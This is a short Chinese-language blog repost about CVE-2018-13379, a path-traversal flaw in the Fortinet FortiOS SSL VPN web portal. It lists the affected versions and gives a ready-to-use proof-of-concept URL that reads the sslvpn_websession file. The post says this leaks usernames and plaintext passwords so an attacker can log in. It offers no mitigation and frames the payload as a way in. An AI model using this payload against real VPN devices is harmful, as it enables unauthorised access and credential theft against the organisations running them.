首页 > 其他分享> > 飞塔vpn账号密码泄露（CVE-2018-13379）

飞塔vpn账号密码泄露（CVE-2018-13379）

2021-03-09 18:30:34 作者：互联网

影响版本

Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 under SSL VPN web portal

利用CVE-2018-13379来泄露会话文件。这个session文件中包含一些有价值的信息，比如用户名以及明文密码，这样我们就可以轻松登录。

poc

https://x.x.x.x/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession

这里我们需要猜一下哪个是用户名和密码

标签：5.4,5.6,..,飞塔,2018,6.0,CVE
来源： https://blog.csdn.net/qq_44159028/article/details/114593863